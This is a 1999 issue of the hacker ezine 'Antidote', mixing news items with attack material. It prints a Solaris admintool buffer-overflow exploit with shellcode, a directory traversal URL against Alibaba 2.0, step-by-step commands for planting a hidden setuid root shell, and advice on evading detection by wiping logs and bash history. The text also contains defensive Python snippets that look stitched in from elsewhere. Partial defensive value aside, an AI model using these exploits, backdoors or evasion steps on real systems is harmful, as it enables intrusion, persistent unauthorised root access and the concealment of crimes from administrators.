Antidote Vol. 02 Issue 04
Volume 2 Issue 4
5/16/99
[ASCII-art Antidote logo]
http://www.thepoison.org/antidote
------------------------------
Here is another issue of Antidote. Right now we have over 415 subscribers and we are
getting more and more subscribers every day. We are very sorry to say that we are not
going to be sending Antidote as an attachment anymore, because we have gotten so many
subscribers that our mail server is going ape shit when we send them (we don't have a
mail server just for Antidote). What we are going to start doing is just e-mail everyone
the URL where they can download the new issue of Antidote. So you will start receiving
e-mails about every week telling you that a new issue of Antidote has been released and
where you can get it. Sorry if this is an inconvenience to anyone, but it is such a
hassle to send this as an attachment because of the mail server. The last issue that we
sent as an attachment took us over 2 and a half hours to send to all of the users because
of problems, and the mail server kept crashing because of it.
At Antidote, we never ask anything from anyone except articles, which are optional, but
now, if you could, please visit our sponsor, because we have to pay for the domain
(www.thepoison.org) and it is getting too expensive to keep it up, though we don't
want to take it down. So please take 2 seconds out of your time and go to the
following URL and click on our sponsor:
http://www.thepoison.org/popup.html
The reason why we don't link the sponsor directly from here is because they have a
referral page where you type in the URL of the page that will have the link on it, and if
the referral does not come from that page, then the 'hit' does not count. So please go to
that URL and click on our sponsor!
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Alibaba 2.0
1.02 - CIH has gone 'phoney'
1.03 - Admintool Overflow
1.04 - Corel Virus
1.05 - Check.pl
1.06 - SSHD Root
2.00 - Misc
2.01 - Root : Anytime
2.02 - How Not to Get Caught
2.03 - Trojan Ports
------------------------------
0.00 --=\\Beginning\\=--
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to teach
you how to hack or anything, but we will supply you with the current information and
exploits. Mainly Antidote is just a magazine for people to read if they have some extra
time on their hands and are bored with nothing to do. If you want to read a magazine
that teaches you how to hack etc., then you might want to go to your local bookstore and
see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions, and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote not to be for the beginner, or it does not teach you the basics;
why is that?
Antidote is for everyone. All we basically are is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are received second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will receive Antidote the second we release it, and the
e-mail will contain a hyperlink to the URL from which you can download the current issue.
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to
be published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you might
want to send it again because we probably didn't get it (we respond to all e-mails no
matter what). We might use your article in future issues of Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well, that's it for our FAQ. If you have a question that is not on here or the question is
on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and some are groups in general. If you are not on this list and you feel that for some
reason you should be, then please contact Lord Oak and he will post you on here, and we
are sorry for the misunderstanding. Well, here are the shout outs:
Lord Oak
EazyMoney
Duece
Astral
Black Magick
oX1dation
Forlorn
Retribution
0dnek
www.thepoison.org
Serial Killer
Jaynus
Like we said above, if we forgot you and/or you think you should be added, please e-mail
lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submissions. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we receive two e-mails with the same topic/idea then we will use the one
that we received first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic, so that way you don't waste your time writing
something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
Thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if we
like it).
------------------------------
[ASCII-art banner]
http://www.403-security.org
For the latest hacks and news
1.00 --=\\News & Exploits\\=--
1.01 --=\\Alibaba 2.0\\=--
I've found a security hole in the web server Alibaba 2.0 (the latest version). I haven't
tried it on any other version. Here's an example: If you install it so the web root is
located in c:\alibaba\HtmlDocs\ you can send a URL:
http://www.server.se/../../winnt/file.txt
and get the "file.txt" file. This works all over the disk Alibaba is installed on. If
directory browsing isn't allowed you have to know the pathname of the file you want. If
directory browsing is allowed you can start at the disk root directory, but you have to
enter the directories by hand when browsing, because the server will assume they are
located in the web root, so if you just click around all you'll get is lots of 404's.
/Arne Vidstrom- comment for Russ to be removed when posting out on the list - I haven't
contacted the vendor at all.
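The traversal Arne describes is the server failing to keep the resolved path inside its web root. As an added example (not part of his report and not Alibaba's code), here is that broken mapping beside a hardened one; the document root (written as a POSIX path standing in for c:\alibaba\HtmlDocs) and the request paths are constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed stand-in for c:\alibaba\HtmlDocs, written as a POSIX path.
DOC_ROOT = "/alibaba/HtmlDocs"


def naive_map(doc_root, request_path):
    """The broken behaviour: glue the request path onto the root and let the
    '..' components climb out of it. This is what the report demonstrates."""
    return posixpath.normpath(doc_root + "/" + request_path.lstrip("/"))


def safe_map(doc_root, request_path):
    """Decode, normalise, then refuse anything that resolves outside the root.
    Returns the filesystem path to serve, or None for a rejected request."""
    path = unquote(request_path)          # %2e%2e -> .. before any checks
    path = path.replace("\\", "/")        # Windows servers accept either separator
    if "\0" in path:
        return None                       # NUL would truncate the path in C APIs
    root = posixpath.normpath(doc_root)
    resolved = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    # Compare with a trailing "/" so /alibaba/HtmlDocs2 does not pass as inside.
    if resolved != root and not resolved.startswith(root + "/"):
        return None
    return resolved


if __name__ == "__main__":
    for req in ("/index.html", "/../../winnt/file.txt", "/..%2f..%2fwinnt/file.txt"):
        print(req, "->", naive_map(DOC_ROOT, req), "| hardened:", safe_map(DOC_ROOT, req))
```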
------------------------------
1.02 --=\\CIH has gone 'phoney'\\=--
[www.cnn.com]
A fast-traveling rumor that the Chernobyl virus that melted down at least 600,000
computers worldwide last month would wreak havoc on cellular phones in Lebanon on
Saturday tangled telephone lines and briefly shut down Lebanon's telephone network.
Lebanese flipped off their mobiles and picked up traditional telephones to warn friends
and family to do the same. The panic in this cellular-loving country overloaded the
network, disrupting service for a few minutes, Ad-Diyar daily newspaper reported Sunday.
Losses from the drop in cellular calls amounted to dlrs 30,000, the newspaper reported.
The Chernobyl virus, timed to strike computers on the April 26 anniversary of the
Chernobyl nuclear disaster, tries to erase a computer's hard drive and write gibberish
into system settings.
Parliament was considering an investigation into the source of the rumor, which
Lebanon's two cellular companies scrambled in vain to debunk as technically implausible.
Reporters tried Saturday to reach the Lebanese communications minister about the scare,
according to the London-based Al-Hayat newspaper. His two cellular phones, however, were
shut off.
http://www.cnn.com/WORLD/meast/9905/09/lebanon.cell.hoax.ap/
------------------------------
1.03 --=\\Admintool Overflow\\=--
/*=============================================================================
admintool Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY yourdisplay (ex. setenv DISPLAY 192.168.0.100:0.0)
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#
In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>     /* system(), putenv(), exit() */
#include <string.h>     /* memset(), strlen() */

#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013

char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

/* SPARC only: copies %sp into %i0, which becomes the caller's %o0 (the
   return value) when this register-window function returns. */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;

int main(void)
{
    system(PKGDIR);
    putenv("LANG=");
    /* An empty pkgmap is enough for admintool to treat /tmp/EXP as a package. */
    if ((fp = fopen(PKGMAP, "wb")) == NULL) {
        printf("Can not write '%s'\n", PKGMAP);
        exit(1);
    }
    fclose(fp);
    if ((fp = fopen(PKGINFO, "wb")) == NULL) {
        printf("Can not write '%s'\n", PKGINFO);
        exit(1);
    }
    /* PKG= field: overlong value made of the guessed return address,
       skipping any address that contains a zero byte (it would end the
       string early). */
    fprintf(fp, "PKG=");
    ret_adr = get_sp() - OFFSET;
    while ((ret_adr & 0xff000000) == 0 ||
           (ret_adr & 0x00ff0000) == 0 ||
           (ret_adr & 0x0000ff00) == 0 ||
           (ret_adr & 0x000000ff) == 0)
        ret_adr += 4;
    printf("Jumping address = %lx\n", ret_adr);
    memset(x, 'a', 4);
    for (i = ADJUST1; i < 1000; i += 4) {
        x[i+3] = ret_adr & 0xff;              /* big-endian word layout */
        x[i+2] = (ret_adr >> 8) & 0xff;
        x[i+1] = (ret_adr >> 16) & 0xff;
        x[i+0] = (ret_adr >> 24) & 0xff;
    }
    x[BUFSIZE1] = 0;
    fputs(x, fp);
    fprintf(fp, "\n");
    /* NAME= field: NOP sled with the payload placed OFFSET2 bytes in. */
    fprintf(fp, "NAME=");
    memset(x, 'a', 4);
    for (i = ADJUST2; i < BUFSIZE2; i += 4) {
        x[i+3] = NOP & 0xff;
        x[i+2] = (NOP >> 8) & 0xff;
        x[i+1] = (NOP >> 16) & 0xff;
        x[i+0] = (NOP >> 24) & 0xff;
    }
    for (i = 0; i < strlen(exploit_code); i++)
        x[i+ADJUST2+OFFSET2] = exploit_code[i];
    x[BUFSIZE2] = 0;
    fputs(x, fp);
    fprintf(fp, "\n");
    fprintf(fp, "VERSION=1.00\n");
    fprintf(fp, "ARCH=sparc\n");
    fprintf(fp, "CLASSES=none\n");
    fprintf(fp, "CATEGORY=application\n");
    fprintf(fp, "PSTAMP=990721\n");
    fprintf(fp, "BASEDIR=/\n");
    fclose(fp);
    system("admintool");
    return 0;
}
------------------------------
1.04 --=\\Corel Virus\\=--
[www.pcworld.com]
A new wrinkle in computer viruses appeared this week with the discovery of a virus that
infects the script language used by Corel products. But experts say the GaLaDRiel (or
C.S.Gala) virus will affect few users, and is not destructive.
The virus is not contained in the company's applications, according to a Corel
representative. You can get it only by receiving an infected script file from another
user via disk or download. When it triggers, all the virus does is display text.
GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for
Network Associates, maker of McAfee Antivirus. The virus is rare, doesn't spread easily,
and causes minimal damage, Viveros says.
Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't
launch automatically. You have to run the infected script for it to spread. And the
virus doesn't infect program files.
After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only,
displaying seven lines from J.R.R. Tolkien's The Lord of the Rings. As far as virus
researchers have been able to ascertain, GaLaDRiel does nothing else.
All major developers of antivirus software plan to add detection and removal of
GaLaDRiel to their latest virus updates within the next two weeks.
How to Check for the Virus
Corel recommends taking the following steps to see if your scripts have been infected
and to remove the virus if they have been:
1. Using Windows Explorer, browse the directory that contains the potentially infected
scripts.
2. Right-click on a Corel script.csc file and select Open.
3. When the Corel Script Editor opens, examine the first line of the script. If the
text begins with REM ViRUS GaLaDRiel, then your script is infected.
4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM
END OF ViRUS.
5. Resave your Corel Script file with the same name, overwriting the infected version.
6. Repeat the above steps for all .csc files in the same directory. (This final step
is important, because running any infected Corel Script file will infect all other
.csc files in the same directory.)
http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html
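The six manual steps above can be applied to a whole directory at once. This added example (not from the article and not from Corel) uses the two marker lines the article gives, REM ViRUS GaLaDRiel and REM END OF ViRUS; the .csc contents are constructed samples, and a script whose end marker is missing is reported but left untouched rather than half-cleaned.

```python
import os
import shutil
import tempfile

START_MARKER = "REM ViRUS GaLaDRiel"   # step 3: first line of an infected script
END_MARKER = "REM END OF ViRUS"        # step 4: last line of the inserted block


def is_infected(script_text):
    """Step 3: an infected script begins with the REM ViRUS GaLaDRiel line."""
    first_line = script_text.splitlines()[0] if script_text else ""
    return first_line.strip().upper().startswith(START_MARKER.upper())


def disinfect(script_text):
    """Step 4: drop every line from the start marker through the end marker.
    Returns (cleaned_text, lines_removed); lines_removed is 0 for a clean
    script and -1 (text unchanged) when the end marker cannot be found."""
    lines = script_text.splitlines(keepends=True)
    if not lines or not is_infected(script_text):
        return script_text, 0
    for i, line in enumerate(lines):
        if line.strip().upper().startswith(END_MARKER.upper()):
            return "".join(lines[i + 1:]), i + 1
    return script_text, -1


def scan_directory(directory, fix=False):
    """Step 6: check every .csc file in one directory; rewrite them if fix=True.
    Returns {filename: status}."""
    report = {}
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(".csc"):
            continue
        path = os.path.join(directory, name)
        with open(path, "r", encoding="latin-1") as fh:
            text = fh.read()
        if not is_infected(text):
            report[name] = "clean"
            continue
        cleaned, removed = disinfect(text)
        if removed < 0:
            report[name] = "infected, end marker missing"
        elif fix:
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(cleaned)              # step 5: overwrite in place
            report[name] = "cleaned (%d lines removed)" % removed
        else:
            report[name] = "infected"
    return report


# Constructed samples; the body between the markers is a placeholder.
INFECTED_SAMPLE = (
    "REM ViRUS GaLaDRiel\n"
    "REM (constructed stand-in for the virus body)\n"
    "REM END OF ViRUS\n"
    "REM original script follows\n"
    "MESSAGE \"hello\"\n"
)
CLEAN_SAMPLE = "REM original script\nMESSAGE \"hello\"\n"


def demo():
    """Write both samples to a temp dir, clean it, then scan it again."""
    tmp = tempfile.mkdtemp()
    try:
        for name, text in (("bad.csc", INFECTED_SAMPLE), ("good.csc", CLEAN_SAMPLE)):
            with open(os.path.join(tmp, name), "w", encoding="latin-1") as fh:
                fh.write(text)
        before = scan_directory(tmp, fix=True)
        after = scan_directory(tmp)
        return before, after
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    print(demo())
```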
------------------------------
1.05 --=\\Check.pl\\=--
#!/usr/bin/perl -w
#
# Check.pl
# Written by David Allen
# s2mdalle@titan.vcu.edu
# http://opop.nols.com/
#
# Released under the terms of the GNU GPL
#
# Run the program with an argument of the directory you want to completely scan
# Usage:
# check.pl /
#
# Currently this program DOES NOT follow symlinks because of some program's
# tendencies to have circular symlinks which will run you out of memory
# pretty fast. And that's evil. Maybe I'll make it check for circular
# symlinks later, but right now, that's a real pain in the ass.
#
# This program reports SUID, SGID, STICKY, writeable files by
# the effective user. This is best run with the permissions of a regular
# user who shouldn't be editing a lot of your files. :)
#
# It prints everything to STDOUT by default. Redirect the output wherever
# the hell you want it.
use strict; # Keep me honest

my $root = shift;
my $BEGINNING_LEVEL = 0;
if (not $root)
{
    # Initialize if the user didn't give us anything to cling to.
    $root = "/";
}

# Level indexing is provided for debugging and to check if it's going out
# of control. In dirinfo() you can adjust what the warning and error levels
# are for the number of directory levels deep this will check.
print "Calling dirinfo\n";
dirinfo($root, $BEGINNING_LEVEL);

sub dirinfo
{
    my $dirname = shift;
    my $level = shift;
    my $MAXLEVEL = 100;
    my $WARNINGLEVEL = 50;
    if ($level == $WARNINGLEVEL)
    {
        print STDERR "WARNING: Deep directory structure. I hope you have some serious RAM free...\n";
    }
    if ($level > $MAXLEVEL)
    {
        print STDERR "ERROR: Max recursion met - directory structure deeper than $MAXLEVEL directories. That's bad. You can change the default in the script, or you can see if you can find any circular symlinks that are causing the problem. Check the end of your output for clues.\n\n";
        die "ERROR: Max-eval-depth error.\n";
    }
    # Lexical handle, closed as soon as the listing is read so that deep
    # recursion doesn't pile up open directory handles.
    opendir(my $HANDLE, $dirname) or return(-1);
    my @allfiles = readdir $HANDLE;
    closedir $HANDLE;
    # print "Reading info on \"$dirname\"...\n";
    TORTURE: foreach my $file (@allfiles)
    {
        my $foobar;
        if ($dirname eq "/")
        {
            $foobar = $dirname . $file;
        }
        else
        {
            $foobar = $dirname . "/" . $file;
        }
        # print "\"$foobar\" level $level\n";
        if (($file eq ".") or ($file eq ".."))
        {
            # Go on your merry way...ignore this one.
        }
        # If the file is writeable, and doesn't belong to the user running
        # this script, then it gets reported.
        elsif ((-W $foobar) and (not (-O $foobar))) # File is writeable&&!owned
        {
            # If it's a directory, report it as such.
            if (-d $foobar) # File is a directory
            {
                print "\"$foobar\" ### WRITEABLE DIR\n";
            }
            else
            {
                my $fileinfo = `ls -l "$foobar"`;
                chomp($fileinfo);
                print "\"$fileinfo\" ### WRITEABLE\n";
            } # End else
        } # End elsif
        elsif (-l $foobar)
        {
            # my $fileinfo=`ls -l "$foobar"`;
            # chomp($fileinfo);
            # print "\"$fileinfo\" ### SYMLINK\n";
            # Symlink evilness. Especially with GNOME. :(
        }
        elsif (-d $foobar) # File is a directory
        {
            # File is a directory - recurse through it
            # DEBUG: print "Entering \"$file\" coming from \"$dirname\"\n";
            my $tmp = dirinfo($foobar, ($level + 1));
            if ($tmp == -1)
            {
                print "Directory $foobar not readable with your sorry UID.\n";
            }
        }
        elsif (-u $foobar) # File is SUID
        {
            my $fileinfo = `ls -l "$foobar"`;
            chomp($fileinfo);
            print "$fileinfo ### SUID\n";
        }
        elsif (-g $foobar) # File is SGID
        {
            my $fileinfo = `ls -l "$foobar"`;
            chomp($fileinfo);
            print "$fileinfo ### SGID\n";
        }
        elsif (-k $foobar) # File is sticky
        {
            my $fileinfo = `ls -l "$foobar"`;
            chomp($fileinfo);
            print "$fileinfo ### STICKY\n";
        }
        else
        {
            # DEBUG2: print "\"$foobar\" doesn't look very interesting to me.\n";
        }
    } # End foreach
    return 0; # Success; -1 is reserved for directories we couldn't open.
} # End dirinfo
------------------------------
1.06 --=\\SSHD Root\\=--
When was the last time you rebuilt all privileged (`suid root') applications when
upgrading a unix system, just in case?
I'm pretty sure one can find `small print' that demands this, however I'm equally sure
that hardly any system manager does so, since problems seem to occur _very_ rarely.
Here's a neat one:
Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a
not-so-common platform (nothing really security-relevant, machine used for raw speed
only, users just being accustomed to that sort of login). Said platform (featuring a
particularly elaborate user data base) requires some special calls (simple calling
sequences) to be done during `login' - no problem, `sshd' knows about them, although not
explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not
allow `root' logins from the outside. What other harm could it possibly do?
Upgrade has to occur somewhat in a hurry, release documentation isn't on-site, but
procedures are known well enough. S.M. asks the manufacturer's support representative if
special precautions have to be taken, "errr, not that I'd think so". S.M. installs new
version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to
work the same as before.
A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters
`su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for
a password. Minutes later, S.M. recognizes that `su' would never ask for a password,
when the parent process had been created via `sshd' ... in spite of no other visible
peculiarities with that process.
A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the
problem.
Quite a few years ago, when I saw the first mention of `ssh', I commented "If you're a
bank, you don't buy your safe at a flea market; if you're not, you might be better off
without a safe". Maybe there's _some_ truth in it, after all.
Imagine uSoft going open source, and no-one going to have a look at it...
------------------------------
[ASCII-art banner]
http://www.nudehackers.com
2.00 --=\\Misc\\=--
2.01 --=\\Root : Anytime\\=--
After gaining root access to a server you always risk the chance of losing access. The
admin may change the password or fix the hole allowing a root shell. Well now you have
a way to keep that root shell. The admin can change the password or fix the security
hole. As long as you have local access, you have root access. Down to the nitty gritty.
In the /bin dir there is a file named sh. This is the actual shell. By running this the
user will have shell access as the user that owns it.
Once you have root on the computer, after you fix the logs and the .bash_history, go
to the /bin dir and copy sh to a dir with permissions of 777 (or that you have access
to). After you have finished go back and change permissions on the dir to 700 so no one
else can access this without knowing the file name and where it is. If you have an
account on the box simply create a dir inside your home dir where you can hide it. If you
don't have access then you can copy it to the /tmp dir or even make a different one and
hide it. To hide the dir, instead of a name such as HERE, use .HERE. The period in front
will hide it from ls (using ls -a will show it). Now once you have sh in that dir chmod it
to 4777; this will modify the setuid bit, allowing it to set the userid of the person who
ran the file to the userid of the owner of the file, in this case root. Now time to hide
this file. In case your dir is found or viewed, hide the file. Again, instead of leaving
the name sh, name it .sh, or even go farther and name it something other than sh so it's
not as noticeable. Now you have a ROOT SHELL any time. This also works with users other
than root.
Here's a lil example:
[root@hacked box]$ mkdir /home/forlorn/.here
[root@hacked box]$ chmod 777 /home/forlorn/.here
[root@hacked box]$ copy /bin/sh /home/forlorn/.here
[root@hacked box]$ cd /home/forlorn/.here
[root@hacked box]$ chmod 4777 sh
[root@hacked box]$ mv sh .jk
[root@hacked box]$ su forlorn
password:
[forlorn@hacked box]$ cd .here
./.jk
bash# whoami
root
heh :)
rootshell anytime
Forlorn
forlorn@Nudehackers.com
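From the defender's side, the setuid copy Forlorn describes and the SUID/SGID reporting in Check.pl (section 1.05) come down to one question: which setuid files exist where no package would have put them? This added example (not Forlorn's or David Allen's code) walks a tree without following symlinks and flags setuid/setgid files that sit outside an assumed allowlist of system directories, carry a dot-prefixed name, or hash to a known shell binary; the allowlist and the planted sample file are constructed.

```python
import hashlib
import os
import shutil
import stat
import tempfile

# Where setuid binaries normally live (constructed allowlist; adjust per system).
EXPECTED_SUID_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/libexec")


def sha256_of(path):
    """Hash a file's contents so a renamed copy of /bin/sh is still recognised."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suspicious_suid(root, shell_hashes=(), expected_dirs=EXPECTED_SUID_DIRS):
    """Walk root without following symlinks and return (path, uid, mode, reasons)
    for every setuid/setgid regular file that is outside expected_dirs, hidden
    behind a dot-name, or byte-identical to a known shell binary."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never trust what a link points at
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            reasons = []
            if not any(dirpath == d or dirpath.startswith(d + "/") for d in expected_dirs):
                reasons.append("outside expected dirs")
            if name.startswith(".") or os.path.basename(dirpath).startswith("."):
                reasons.append("hidden name")
            if shell_hashes and sha256_of(path) in shell_hashes:
                reasons.append("copy of a shell binary")
            if reasons:
                findings.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode)), reasons))
    return findings


def demo():
    """Plant a constructed stand-in for the hidden setuid shell copy and scan it."""
    tmp = tempfile.mkdtemp()
    try:
        hidden = os.path.join(tmp, "home", "user", ".here")
        os.makedirs(hidden)
        planted = os.path.join(hidden, ".jk")
        with open(planted, "wb") as fh:
            fh.write(b"#!/bin/sh\necho constructed stand-in for /bin/sh\n")
        os.chmod(planted, 0o4755)            # the chmod 4777 step, minus world-write
        benign = os.path.join(tmp, "home", "user", "notes.txt")
        with open(benign, "w") as fh:
            fh.write("nothing to see\n")
        findings = find_suspicious_suid(tmp, shell_hashes={sha256_of(planted)})
        return [(os.path.relpath(p, tmp), reasons) for p, _uid, _mode, reasons in findings]
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for rel, why in demo():
        print(rel, "->", ", ".join(why))
```

Run it as an unprivileged user against / with the real sha256 of /bin/sh in shell_hashes; a Check.pl run and this scan should agree on the setuid set, and anything only this scan flags is the odd one out.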
------------------------------
2.02 --=\\How Not to Get Caught\\=--
Lots have said it. "I am scared to hack because I might get caught and go to jail!!!",
etc, etc, etc. You've all seen it before. There are plenty of ways to be cautious. And
not to get caught (or get on the public's and media's good side if you do). When hacking
any type of *nix system, always check /etc/syslog.conf and check to make sure all the
logs were taken care of. A good Sys Admin will log in more places than in /var/log/.
Ya know? Among other things, DON'T EVER DELETE OR MODIFY UNNECESSARY FILES. EVER. Of
course, unless the admin has completely made a fool of you, then feel free to do a
rm -rf /* if you like. =P If you are patient, you could always commence your hack of a
machine/network over a period of time to lower suspicion. Lots of logs in 1 night of
you attacking would be noticed easier by an admin/log-checker than one over a period of
2 weeks or so. Attacking patiently will reduce the chances of you being noticed while
trying to gain access. This is a mistake many new skool hackers have made. Bragging about
your hacks. Posting on 500 usenets and bbs's saying "Y0 F00LZ I H4K0R3D FBI.GOV" will
get you busted real fast, if you catch my drift. Keep your major hacks to yourself
and/or your group. You should have pride in your hacks, and knowing that no one else
knows you are there is a great feeling that you know you have truly gained access to a
computer as a ghost.
Of course, you could just be having a bad day, and you just forget to clean one little
thing out and the admin notices. First off, the action taken against a hacker is greatly
exaggerated. An admin of a machine in the middle of bumfuck Ohio mailing your ISP about a
hack won't do much to ya. Most ISPs, when told about criminal activity, just cancel your
account, and that's it. Unless it is federal, international, or had something to do with
banks or large corps. Let's just say, you won't go to jail for hacking anything worth
under $50k. =) heh. Now, if it is big, and you get caught hacking, say, looking at
planes for the new F-22 stealth fighter circuitry plans, you will go to court swiftly.
This is when your not deleting or modifying comes in handy. The media will glorify you
as a victim if you just simply say, "I was reading some very interesting information
about the unclassified planes". They will give you the public's love, and that is good!
heh. Out of all my experience, the above are the most important things I have learned to
do and abide by. Remember, more than 100X's the new skool (malicious) hackers are caught
than us oldskool hackers!
Jaynus
http://Security.Jaynus.Com
------------------------------
2.03 --=\\Trojan Ports\\=--
After seeing several questions about traffic directed at ports as 31337 and 12345 I've
put together a list of all trojans known to me and the default ports they are using. Of
course several of them could use any port, but I hope this list will maybe give you a
clue of what might be going on.
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth,
Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack'99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
